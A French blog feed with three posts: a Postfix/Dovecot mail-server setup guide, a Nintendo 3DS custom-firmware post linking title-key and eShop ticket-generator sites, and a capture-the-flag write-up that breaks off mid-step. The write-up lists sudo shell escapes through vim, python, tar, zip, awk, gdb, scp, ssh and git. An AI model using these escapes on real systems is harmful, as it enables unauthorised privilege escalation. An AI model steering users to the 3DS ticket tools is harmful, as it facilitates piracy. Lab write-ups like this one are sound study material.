<span class="s s-Atom">#</span> <span class="nv">SASL</span> <span class="nv">PARAMETERS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">smtpd_sasl_auth_enable</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">smtpd_sasl_type</span> <span class="o">=</span> <span class="s s-Atom">dovecot</span>
<span class="s s-Atom">smtpd_sasl_path</span> <span class="o">=</span> <span class="s s-Atom">private</span><span class="o">/</span><span class="s s-Atom">auth</span>
<span class="s s-Atom">smtpd_sasl_security_options</span> <span class="o">=</span> <span class="s s-Atom">noanonymous</span>
<span class="s s-Atom">smtpd_sasl_tls_security_options</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">smtpd_sasl_security_options</span>
<span class="s s-Atom">smtpd_sasl_local_domain</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">mydomain</span>
<span class="s s-Atom">smtpd_sasl_authenticated_header</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">broken_sasl_auth_clients</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">###############</span>
<span class="s s-Atom">#</span> <span class="nv">VIRTUALS</span> <span class="nv">MAPS</span> <span class="nv">PARAMETERS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">###############</span>
<span class="s s-Atom">virtual_uid_maps</span> <span class="o">=</span> <span class="nn">static</span><span class="p">:</span><span class="mi">5000</span>
<span class="s s-Atom">virtual_gid_maps</span> <span class="o">=</span> <span class="nn">static</span><span class="p">:</span><span class="mi">5000</span>
<span class="s s-Atom">virtual_minimum_uid</span> <span class="o">=</span> <span class="mi">5000</span>
<span class="s s-Atom">virtual_mailbox_base</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">var</span><span class="o">/</span><span class="s s-Atom">mail</span>
<span class="s s-Atom">virtual_transport</span> <span class="o">=</span> <span class="nn">lmtp</span><span class="p">:</span><span class="nn">unix</span><span class="p">:</span><span class="s s-Atom">private</span><span class="o">/</span><span class="s s-Atom">dovecot</span><span class="o">-</span><span class="s s-Atom">lmtp</span>
<span class="s s-Atom">virtual_mailbox_domains</span> <span class="o">=</span> <span class="nn">mysql</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">postfix</span><span class="o">/</span><span class="s s-Atom">mysql</span><span class="o">-</span><span class="s s-Atom">virtual</span><span class="o">-</span><span class="s s-Atom">mailbox</span><span class="o">-</span><span class="s s-Atom">domains</span><span class="p">.</span><span class="s s-Atom">cf</span>
<span class="s s-Atom">virtual_mailbox_maps</span> <span class="o">=</span> <span class="nn">mysql</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">postfix</span><span class="o">/</span><span class="s s-Atom">mysql</span><span class="o">-</span><span class="s s-Atom">virtual</span><span class="o">-</span><span class="s s-Atom">mailbox</span><span class="o">-</span><span class="s s-Atom">maps</span><span class="p">.</span><span class="s s-Atom">cf</span>
<span class="s s-Atom">virtual_alias_maps</span> <span class="o">=</span> <span class="nn">mysql</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">postfix</span><span class="o">/</span><span class="s s-Atom">mysql</span><span class="o">-</span><span class="s s-Atom">virtual</span><span class="o">-</span><span class="s s-Atom">alias</span><span class="o">-</span><span class="s s-Atom">maps</span><span class="p">.</span><span class="s s-Atom">cf</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">#</span> <span class="nv">ERRORS</span> <span class="nv">REPORTING</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">notify_classes</span> <span class="o">=</span> <span class="s s-Atom">bounce</span><span class="p">,</span> <span class="s s-Atom">delay</span><span class="p">,</span> <span class="s s-Atom">resource</span><span class="p">,</span> <span class="s s-Atom">software</span>
<span class="s s-Atom">notify_classes</span> <span class="o">=</span> <span class="s s-Atom">resource</span><span class="p">,</span> <span class="s s-Atom">software</span>
<span class="s s-Atom">error_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">delay_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">bounce_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#</span> <span class="mi">2</span><span class="s s-Atom">bounce_notice_recipient</span> <span class="o">=</span> <span class="s s-Atom">admin@domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">#########</span>
<span class="s s-Atom">#</span> <span class="nv">RESTRICTIONS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">#########</span>
<span class="s s-Atom">smtpd_recipient_restrictions</span> <span class="o">=</span>
<span class="s s-Atom">permit_mynetworks</span><span class="p">,</span>
<span class="s s-Atom">permit_sasl_authenticated</span><span class="p">,</span>
<span class="s s-Atom">reject_non_fqdn_recipient</span><span class="p">,</span>
<span class="s s-Atom">reject_unauth_destination</span><span class="p">,</span>
<span class="s s-Atom">reject_unknown_recipient_domain</span><span class="p">,</span>
<span class="s s-Atom">reject_rbl_client</span> <span class="s s-Atom">zen</span><span class="p">.</span><span class="s s-Atom">spamhaus</span><span class="p">.</span><span class="s s-Atom">org</span>
<span class="s s-Atom">smtpd_helo_restrictions</span> <span class="o">=</span>
<span class="s s-Atom">permit_mynetworks</span><span class="p">,</span>
<span class="s s-Atom">permit_sasl_authenticated</span><span class="p">,</span>
<span class="s s-Atom">reject_invalid_helo_hostname</span><span class="p">,</span>
<span class="s s-Atom">reject_non_fqdn_helo_hostname</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">reject_unknown_helo_hostname</span>
<span class="s s-Atom">smtpd_client_restrictions</span> <span class="o">=</span>
<span class="s s-Atom">permit_mynetworks</span><span class="p">,</span>
<span class="s s-Atom">permit_inet_interfaces</span><span class="p">,</span>
<span class="s s-Atom">permit_sasl_authenticated</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">reject_plaintext_session</span><span class="p">,</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">reject_unauth_pipelining</span>
<span class="s s-Atom">smtpd_sender_restrictions</span> <span class="o">=</span>
<span class="s s-Atom">reject_non_fqdn_sender</span><span class="p">,</span>
<span class="s s-Atom">reject_unknown_sender_domain</span>
</code></pre></div>
<h2>/etc/postfix/master.cf</h2>
<div class="highlight"><pre><span></span><code>smtp inet n - - - - smtpd
submission inet n - - - - smtpd
-o syslog_name=postfix/submission
-o smtpd_tls_dh1024_param_file=<span class="cp">${</span><span class="n">config_directory</span><span class="cp">}</span>/dh2048.pem
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_client_restrictions=permit_sasl_authenticated,reject
</code></pre></div>
<h2>Masquer les infos</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/header_checks</span>
<span class="err">/^Received:.*with ESMTPSA/ IGNORE</span>
<span class="err">/^X-Originating-IP:/ IGNORE</span>
<span class="err">/^X-Mailer:/ IGNORE</span>
<span class="err">/^User-Agent:/ IGNORE</span>
<span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">mime_header_checks = regexp:/etc/postfix/header_checks</span>
<span class="err">header_checks = regexp:/etc/postfix/header_checks</span>
</code></pre></div>
<p>Redémarrage de postfix pour prendre en charge les modifications</p>
<div class="highlight"><pre><span></span><code>postmap /etc/postfix/header_checks
postfix reload
</code></pre></div>
<h1>Postfixadmin</h1>
<p>Postfix Admin est une interface web permettant la gestion des boites mails, alias et utilisateur virtuels de Postfix. On peut également changer un mot de passe pour une adresse mail depuis cette console.</p>
<div class="highlight"><pre><span></span><code>apt-get install php5-imap
<span class="nb">cd</span> /var/www
wget http://downloads.sourceforge.net/project/postfixadmin/postfixadmin/postfixadmin-2.93/postfixadmin-2.93.tar.gz
tar -xzf postfixadmin-2.93.tar.gz
mv postfixadmin-2.93 postfixadmin
rm -rf postfixadmin-2.93.tar.gz
chown -R www-data:www-data postfixadmin
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="x"># vim /var/www/postfixadmin/config.inc.php</span>
<span class="x">$CONF['configured'] = true;</span>
<span class="x">$CONF['default_language'] = 'fr';</span>
<span class="x">$CONF['database_type'] = 'mysqli';</span>
<span class="x">$CONF['database_host'] = 'localhost';</span>
<span class="x">$CONF['database_user'] = 'postfix';</span>
<span class="x">$CONF['database_password'] = 'MOT DE PASSE';</span>
<span class="x">$CONF['database_name'] = 'postfix';</span>
<span class="x">$CONF['admin_email'] = 'admin@domain.tld';</span>
<span class="x">$CONF['domain_path'] = 'YES';</span>
<span class="x">$CONF['domain_in_mailbox'] = 'NO';</span>
<span class="x">$CONF['fetchmail'] = 'NO';</span>
</code></pre></div>
<p>Création du sous-domaine sur nginx :</p>
<div class="highlight"><pre><span></span><code><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">postfixadmin.domain.tld</span><span class="p">;</span>
<span class="kn">root</span> <span class="s">/var/www/postfixadmin</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="kn">charset</span> <span class="s">utf-8</span><span class="p">;</span>
<span class="kn">location</span> <span class="s">/</span> <span class="p">{</span>
<span class="kn">try_files</span> <span class="nv">$uri</span> <span class="nv">$uri/</span> <span class="s">index.php</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span><span class="sr">*</span> <span class="s">\.php</span>$ <span class="p">{</span>
<span class="kn">include</span> <span class="s">/etc/nginx/fastcgi_params</span><span class="p">;</span>
<span class="kn">fastcgi_pass</span> <span class="s">unix:/var/run/php5-fpm.sock</span><span class="p">;</span>
<span class="kn">fastcgi_index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="kn">fastcgi_param</span> <span class="s">SCRIPT_FILENAME</span> <span class="nv">$document_root$fastcgi_script_name</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>On redémarre nginx pour prendre en charge le nouveau sous-domaine :</p>
<div class="highlight"><pre><span></span><code>service nginx restart
</code></pre></div>
<p>Vous pouvez vous rendre maintenant sur l'url de votre sous-domaine pour configurer Postfix Admin via un navigateur web : http://postfixadmin.domain.tld/setup.php</p>
<p>Il va vous donner un hash qu'il faut renseigner :</p>
<div class="highlight"><pre><span></span><code><span class="x"># vim /var/www/postfixadmin/config.inc.php</span>
<span class="x">$CONF['setup_password'] = 'HASH';</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/x04544fh"> Dovecot</h1>
<p>Dovecot est un serveur IMAP et POP3 pour les systèmes d'exploitation UNIX et dérivés, conçu avec comme premier but la sécurité. Dovecot est distribué en double licence MIT et GPL version 2.</p>
<div class="highlight"><pre><span></span><code>apt-get install dovecot-core dovecot-imapd dovecot-lmtpd dovecot-mysql
</code></pre></div>
<h2>SSL/TLS</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/dovecot/conf.d/10-ssl.conf</span>
<span class="err">ssl = required</span>
<span class="err">ssl_cert = </etc/ssl/certs/mailserver.crt</span>
<span class="err">ssl_key = </etc/ssl/private/mailserver.key</span>
<span class="err">ssl_protocols = !SSLv2 !SSLv3</span>
<span class="err">ssl_cipher_list = ALL:!aNULL:!eNULL:!LOW:!MEDIUM:!EXP:!RC2:!RC4:!DES:!3DES:!MD5:!PSK:!SRP:!DSS:!AECDH:!ADH:@STRENGTH</span>
<span class="err">ssl_prefer_server_ciphers = yes</span>
<span class="err">ssl_dh_parameters_length = 2048</span>
</code></pre></div>
<h1>Spamassassin</h1>
<p>SpamAssassin est un logiciel libre mené par la Apache Software Foundation, auteur du très célèbre serveur Web Apache HTTP Server. Le but de ce logiciel est de filtrer le trafic des courriels pour éradiquer les courriels reconnus comme pourriels ou courriels non sollicités.</p>
<div class="highlight"><pre><span></span><code># vim /etc/postfix/master.cf
smtp inet n - - - - smtpd
-o content_filter=spamassassin
submission inet n - - - - smtpd
-o content_filter=spamassassin
spamassassin unix - n n - - pipe
user=debian-spamd argv=/usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f <span class="cp">${</span><span class="n">sender</span><span class="cp">}</span> <span class="cp">${</span><span class="n">recipient</span><span class="cp">}</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>service postfix reload
</code></pre></div>
<p>Afin de rendre les spams plus visible dans la boite mail, on peut ajouter un header :</p>
<div class="highlight"><pre><span></span><code><span class="c"># vim /etc/spamassassin/local.cf</span>
<span class="nb">rewrite_header</span> Subject *****SPAM*****
<span class="nb">report_safe</span> <span class="m">0</span>
<span class="nb">whitelist_from</span> *@domain.tld
<span class="nb">add_header</span> <span class="k">all</span> Report _REPORT_
<span class="nb">add_header</span> spam Flag _YESNOCAPS_
<span class="nb">add_header</span> <span class="k">all</span> Status _YESNO_, score=_SCORE_ required=_REQD_ tests=_TESTS_ autolearn=_AUTOLEARN_ version=_VERSION_
<span class="nb">add_header</span> <span class="k">all</span> Level _STARS(*)_
<span class="nb">add_header</span> <span class="k">all</span> Checker-Version SpamAssassin _VERSION_ (_SUBVERSION_) <span class="k">on</span> _HOSTNAME_
</code></pre></div>
<p>Activation au démarrage du sustème :</p>
<div class="highlight"><pre><span></span><code>systemctl <span class="nb">enable</span> spamassassin.service
service spamassassin start
</code></pre></div>
<p>Ajout de la mise à jour automatique des filtres :</p>
<div class="highlight"><pre><span></span><code><span class="err"># crontab -e</span>
<span class="err"># Mise à jour des règles de spamassassin</span>
<span class="err">20 02 * * * /usr/bin/sa-update</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/Dj57plDV"> Clamv</h1>
<p>ClamAV is an open source antivirus engine for detecting trojans, viruses, malware and other malicious threats.</p>
<div class="highlight"><pre><span></span><code>apt-get install clamav-milter
service clamav-freshclam stop
freshclam
service clamav-freshclam start
</code></pre></div>
<h2>Intégration avec postfix</h2>
<div class="highlight"><pre><span></span><code>mkdir /var/spool/postfix/clamav
chown clamav /var/spool/postfix/clamav
dpkg-reconfigure clamav-milter
</code></pre></div>
<h2>Réponses</h2>
<div class="highlight"><pre><span></span><code><span class="err">Handle configuration automatically --> yes</span>
<span class="err">User for daemon --> clamav</span>
<span class="err">Additional groups --> laisser le champ vide</span>
<span class="err">path to socket --> /var/spool/postfix/clamav/clamav-milter.ctl</span>
<span class="err">group owner for the socket --> clamav</span>
<span class="err">permissions (mode) for socket --> 666</span>
<span class="err">remove stale socket --> yes</span>
<span class="err">wait timeout for clamd --> 120</span>
<span class="err">foreground --> no</span>
<span class="err">chroot --> laisser le champ vide</span>
<span class="err">pid file --> /var/run/clamav/clamav-milter.pid</span>
<span class="err">temporary path --> /tmp</span>
<span class="err">clamd socket --> unix:/var/run/clamav/clamd.ctl</span>
<span class="err">hosts excluded for scanning --> laisser le champ vide</span>
<span class="err">mail whitelist --> laisser le champ vide</span>
<span class="err">action for "infected" mail --> reject</span>
<span class="err">action on error --> defer</span>
<span class="err">reason for rejection --> Rejecting harmful e-mail: %v found.</span>
<span class="err">headers -> replace</span>
<span class="err">log file --> /var/log/clamav/clamav-milter.log</span>
<span class="err">disable log file locking --> no</span>
<span class="err">maximum log file size --> 50</span>
<span class="err">log time --> yes</span>
<span class="err">use syslog --> no</span>
<span class="err">log facility (type of syslog message) --> LOG_LOCAL6</span>
<span class="err">verbose logging --> no</span>
<span class="err">log level when infected --> off</span>
<span class="err">log level when no threat --> off</span>
<span class="err">size limit for scanned messages --> 25</span>
<span class="err">support multiple recipients --> no</span>
<span class="err">enable log rotation --> yes</span>
</code></pre></div>
<h2>Sélection du miroir le plus proche</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/clamav/freshclam.conf</span>
<span class="err">DatabaseMirror db.fr.clamav.net</span>
</code></pre></div>
<h2>Mise à jour automatique de la base virale</h2>
<div class="highlight"><pre><span></span><code><span class="err"># crontab -e</span>
<span class="err">15 * * * * /usr/bin/freshclam --quiet</span>
</code></pre></div>
<h2>Mappage avec postfix</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">smtpd_milters = unix:/opendkim/opendkim.sock, unix:/opendmarc/opendmarc.sock, unix:/clamav/clamav-milter.ctl</span>
</code></pre></div>
<h2>Redémarrage pour la prise en compte</h2>
<div class="highlight"><pre><span></span><code>service clamav-daemon restart
service postfix reload
</code></pre></div>
<h1>Sieve</h1>
<p>The Dovecot Sieve plugin provides mail filtering facilities at time of final message delivery using the Sieve (RFC 5228) language. By writing Sieve scripts, users can customize how messages are delivered, e.g. whether they are forwarded or stored in special folders. The Sieve language is meant to be simple, extensible and system independent. And, unlike most other mail filtering script languages, it does not allow users to execute arbitrary programs. This is particularly useful to prevent virtual users from having full access to the mail store. The intention of the language is to make it impossible for users to do anything more complex (and dangerous) than write simple mail filters.</p>
<div class="highlight"><pre><span></span><code>apt install dovecot-sieve dovecot-managesieved
apt install sieverules
apt install sieve
chmod <span class="m">755</span> /var/vmail/domain.tld -R
chown vmail:vmail /var/vmail/domain.tld -R
</code></pre></div>
<h1>Ajouter un nouveau nom de domaine</h1>
<p>Ajout domaine Postfixadmin
création compte mail via Postfixadmin</p>
<h2>Dkim</h2>
<p><em>DKIM (DomainKeys Identified Mail) est une norme d'authentification fiable du nom de domaine de l'expéditeur d'un courrier électronique. Elle constitue une protection efficace contre le spam et l'hameçonnage.</em></p>
<p><em>En effet, DKIM fonctionne par signature cryptographique du corps du message et d'une partie de ses en-têtes. Une signature DKIM vérifie donc l'authenticité du domaine expéditeur et garantit l'intégrité du message. DKIM intervient au niveau de la couche application du modèle OSI, ainsi il constitue une double protection pour des protocoles de messagerie électronique tels que SMTP, IMAP et POP en plus de l'utilisation de ces protocoles en mode sécurisé (POPS, IMAPS).</em></p>
<p>Ajout du domaine dans les domaines reconnus par openDKIM</p>
<div class="highlight"><pre><span></span><code><span class="c1"># vim /etc/opendkim/TrustedHosts</span>
*.domain.tld
</code></pre></div>
<p>Ajout de la liaison entre la clé de signature et le nom de domaine</p>
<div class="highlight"><pre><span></span><code><span class="c1"># vim /etc/opendkim/KeyTable</span>
mail._domainkey.domain.tld domain.tld:mail:/etc/opendkim/keys/domain.tld/mail.private
</code></pre></div>
<p>Ajout des adresses mails à signer</p>
<div class="highlight"><pre><span></span><code><span class="c1"># vim /etc/opendkim/SigningTable</span>
*@domain.tld mail._domainkey.domain.tld
</code></pre></div>
<p>Création de la clé de signature</p>
<div class="highlight"><pre><span></span><code>mkdir /etc/opendkim/keys/domain.tld
<span class="nb">cd</span> /etc/opendkim/keys/domain.tld
opendkim-genkey -s mail -d domaine.tld -b <span class="m">1024</span>
chown opendkim:opendkim mail.private
cat mail.txt
</code></pre></div>
<p>Redémarrage des services pour prendre en charge les modifications</p>
<div class="highlight"><pre><span></span><code>service postfix restart
service dovecot restart
service opendkim restart
</code></pre></div>
<h2>DNS</h2>
<p>Afin d'utiliser le serveur de mail avec votre nom de domaine, vous devez rajouter les champs suivants :</p>
<div class="highlight"><pre><span></span><code><span class="p">;</span> <span class="n">webmail</span>
<span class="n">mail</span> <span class="k">IN</span> <span class="n">CNAME</span> <span class="mi">1</span><span class="p">.</span><span class="mi">2</span><span class="p">.</span><span class="mi">3</span><span class="p">.</span><span class="mi">4</span>
<span class="p">;</span> <span class="n">serveur</span> <span class="n">de</span> <span class="n">mail</span>
<span class="o">@</span> <span class="k">IN</span> <span class="n">MX</span> <span class="n">smtp</span>
<span class="n">smpt</span><span class="p">.</span><span class="k">domain</span><span class="p">.</span><span class="n">tld</span> <span class="k">IN</span> <span class="n">A</span> <span class="mi">1</span><span class="p">.</span><span class="mi">2</span><span class="p">.</span><span class="mi">3</span><span class="p">.</span><span class="mi">4</span>
<span class="o">@</span> <span class="k">IN</span> <span class="n">TXT</span> <span class="ss">"v=spf1 a mx ip4:1.2.3.4 ~all"</span>
</code></pre></div>
<p>Si vous avez configuré openDKIM (fortement recommandé), il faut ajouter la clé publique dans un champs DNS de type TXT pour le nom de domaine :</p>
<div class="highlight"><pre><span></span><code><span class="err">mail._domainkey IN TXT "v=DKIM1; k=rsa; p=VOTRE CLE PUBLIQUE"</span>
</code></pre></div>
<h1>Serveur de backup MX</h1>
<p>Afin que le serveur de mail de backup puisse prendre en charge les mails, il faut ajouter le domaine ainsi que l'ensemble des adresses mails valides dans la configuration de Postfix.</p>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">relay_domains = $mydestination, domain.tld</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/relay_recipients</span>
<span class="err">mail@domain.tld OK</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>service postfix restart
</code></pre></div>3DS2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/3ds.html<blockquote>
<p>Les liens ci-dessous sont donnés à titre indiquatif. En aucun cas, je ne peux être tenu pour responsable de vos téléchargements.</p>
</blockquote>
<h1>CFW</h1>
<p>La première étape est d'installer un custom firmware (CFW). Ce guide reprend l'ensemble des étapes à réaliser pour cette installation. Il est également maintenu à jour très fréquemment …</p><blockquote>
<p>Les liens ci-dessous sont donnés à titre indiquatif. En aucun cas, je ne peux être tenu pour responsable de vos téléchargements.</p>
</blockquote>
<h1>CFW</h1>
<p>La première étape est d'installer un custom firmware (CFW). Ce guide reprend l'ensemble des étapes à réaliser pour cette installation. Il est également maintenu à jour très fréquemment.</p>
<p><a href="https://3ds.guide/"></a></p>
<p>Le CFW installé par ce guide est Luma3DS. Il permet l'installation d'homebrew et donc, de fichiers CIA/3DS.</p>
<p><a href="https://github.com/d0k3/GodMode9"></a>
<a href="https://github.com/AuroraWright/Luma3DS"></a></p>
<h1>Homebrew</h1>
<p>Ensemble de programmes réalisés par la communauté. Ils sont très variés et permettent d'ajouter un grand nombre de fonctionnalités à notre console préférée : thème, installation de fichiers CIA, gestion des NAND, éditions des fichier de sauvegardes...</p>
<h2>Les plus utiles</h2>
<table>
<thead>
<tr>
<th></th>
<th>Nom</th>
<th>Usage</th>
</tr>
</thead>
<tbody>
<tr>
<td><img alt="" src="https://img.nlegall.fr/Fcx9Fqvx"></td>
<td>hblauncher_loader v1.2</td>
<td>Elément central pour le lancement des programmes</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/P8rAyVLO"></td>
<td>Free eShop</td>
<td>Open source eShop clone</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/4NuSgLoB"></td>
<td>FBI</td>
<td>Installation des fichiers CIA</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/UTxzCQRx"></td>
<td>Luma3DS Updater</td>
<td>Updater for Luma3DS releases</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/zRN8mlps"></td>
<td>TIKdevil TIKdevil</td>
<td>Ticket Generator</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/haJZbOT4"></td>
<td>tikShop</td>
<td>Generate missing tickets and launch the eShop</td>
</tr>
</tbody>
</table>
<h2>Base de données</h2>
<p>Une grande partie si ce n'est l'ensemble des homebrews disponibles sont présent dans cette base de données. Elle contient également la taille et un lien de téléchargement pour chacun.</p>
<p><a href="https://titledb.com/">https://titledb.com/</a></p>
<h2>CIA</h2>
<p>Sûrement la raison pour laquelle vous avez installer un CFW sur votre console, rendre possible l'installation des fameux fichiers CIA. Le premier permet de récupérer le fichier encTitleKeys.bin. Il est indispensable si vous souhaitez utiliser les homebrews suivants.</p>
<ul>
<li><a href="https://3ds.titlekeys.com/">https://3ds.titlekeys.com/</a></li>
<li><a href="https://gbatemp.net/threads/release-shameless-an-easy-to-use-eshop-ticket-qr-code-generator-for-fbi.424469/">https://gbatemp.net/threads/release-shameless-an-easy-to-use-eshop-ticket-qr-code-generator-for-fbi.424469/</a></li>
<li><a href="https://gbatemp.net/threads/release-socketpunch-fbi-network-cia-installer-for-android-pc.412174/">https://gbatemp.net/threads/release-socketpunch-fbi-network-cia-installer-for-android-pc.412174/</a></li>
<li><a href="https://gbatemp.net/threads/wip-freeshop-open-source-eshop-clone.426573/">https://gbatemp.net/threads/wip-freeshop-open-source-eshop-clone.426573/</a></li>
<li><a href="https://gbatemp.net/threads/release-cdn-fx-the-ultimate-eshop-content-downloader.414004/">https://gbatemp.net/threads/release-cdn-fx-the-ultimate-eshop-content-downloader.414004/</a></li>
</ul>
<p><a href="https://gbatemp.net/threads/release-notifymii-homebrew-notification-manager.423334/">https://gbatemp.net/threads/release-notifymii-homebrew-notification-manager.423334/</a></p>
<h2>Emulateurs</h2>
<p><a href="https://gbatemp.net/threads/tutorial-the-homebrew-launcher-emulators-all-in-one-noobs-guide-snes-gb-gbc-gba-nes.395961/">https://gbatemp.net/threads/tutorial-the-homebrew-launcher-emulators-all-in-one-noobs-guide-snes-gb-gbc-gba-nes.395961/</a></p>
<h1>Thèmes</h1>
<ol>
<li>Open FBI</li>
<li>Select TitleDB</li>
<li>Find CHMM in the list and install</li>
<li>Download a theme from 3DSThem.es</li>
<li>Put the ZIP file you've downloaded into the /Themes folder in your SD Card (create it if it doesn't exist);</li>
<li>Boot up CHMM2, and install the theme</li>
</ol>
<p>Usefull links :</p>
<ul>
<li><a href="https://3dsthem.es/">https://3dsthem.es/</a></li>
<li><a href="https://gbatemp.net/threads/every-3ds-save-editor.396697/">https://gbatemp.net/threads/every-3ds-save-editor.396697/</a></li>
<li><a href="https://gbatemp.net/threads/tutorial-making-custom-furniture-in-animal-crossing-new-leaf.480595/">https://gbatemp.net/threads/tutorial-making-custom-furniture-in-animal-crossing-new-leaf.480595/</a></li>
</ul>Jail - Escape2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/jail-escape.html<p>https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://d00mfist.gitbooks.io/ctf/escaping_restricted_shell.html</p>
<h1>User 1</h1>
<p>app-script-ch14@challenge02:~$ vim --cmd "set shell=/bin/bash" --cmd "shell"</p>
<h1>User 2</h1>
<p>app-script-ch14@challenge02:~$ echo $PATH
/challenge/app-script/ch14/step1/
app-script-ch14@challenge02:~$ export PATH=/bin:/usr/bin
app-script-ch14@challenge02:~$ id
uid=1314(app-script-ch14 …</p><p>https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://d00mfist.gitbooks.io/ctf/escaping_restricted_shell.html</p>
<h1>User 1</h1>
<p>app-script-ch14@challenge02:~$ vim --cmd "set shell=/bin/bash" --cmd "shell"</p>
<h1>User 2</h1>
<p>app-script-ch14@challenge02:~$ echo $PATH
/challenge/app-script/ch14/step1/
app-script-ch14@challenge02:~$ export PATH=/bin:/usr/bin
app-script-ch14@challenge02:~$ id
uid=1314(app-script-ch14) gid=1314(app-script-ch14) groups=1314(app-script-ch14),100(users)
app-script-ch14@challenge02:~$ sudo -l
Matching Defaults entries for app-script-ch14 on challenge02:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user</p>
<p>User app-script-ch14 may run the following commands on challenge02:
(app-script-ch14-2) NOPASSWD: /usr/bin/python
app-script-ch14@challenge02:~$ sudo -u app-script-ch14-2 python
Python 2.7.15+ (default, Oct 7 2019, 17:39:04)
[GCC 7.4.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.</p>
<blockquote>
<blockquote>
<blockquote>
<p>import pty
pty.spawn('/bin/bash')</p>
</blockquote>
</blockquote>
</blockquote>
<h1>User 3</h1>
<p>https://gtfobins.github.io/gtfobins/tar/</p>
<p>app-script-ch14-2@challenge02:~$ sudo -u app-script-ch14-3 tar xf /dev/null -I '/bin/bash -c "bash <&2 1>&2"'</p>
<h1>User 4</h1>
<p>app-script-ch14-3@challenge02:~$ sudo -l
Matching Defaults entries for app-script-ch14-3 on challenge02:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user</p>
<p>User app-script-ch14-3 may run the following commands on challenge02:
(app-script-ch14-4) NOPASSWD: /usr/bin/zip</p>
<p>sudo -u app-script-ch14-4 zip /tmp/test.zip /tmp/jk.sh -T --unzip-command="sh -c /bin/bash"</p>
<h1>USER 5</h1>
<p>sudo -u app-script-ch14-5 awk '{system("/bin/bash");}'</p>
<h1>USER 6</h1>
<p>sudo -u app-script-ch14-6 gdb</p>
<blockquote>
<p>shell</p>
</blockquote>
<h1>User 7</h1>
<p>sudo -u app-script-cha14-7 pico -s "/bin/bash"
/bin/bash CTRL+T</p>
<h1>User 8</h1>
<p>/tmp/superscript : /bin/bash - chmod +x /tmp/superscript
sudo -u app-script-ch14-8 scp -S /tmp/superscript 127.0.0.1: 127.0.0.1:</p>
<h1>User 9</h1>
<p>sudo -u app-script-ch14-9 env /bin/bash</p>
<h1>User 10</h1>
<p>sudo -u app-script-ch14-10 ssh -o ProxyCommand=';bash 0<&2 1>&2' 127.0.0.1</p>
<p># User 11
sudo -u app-script-cha14-11 git help status
!/bin/bash
mkdir /tmp/qspod
cd /tmp/qspod
git init
touch a
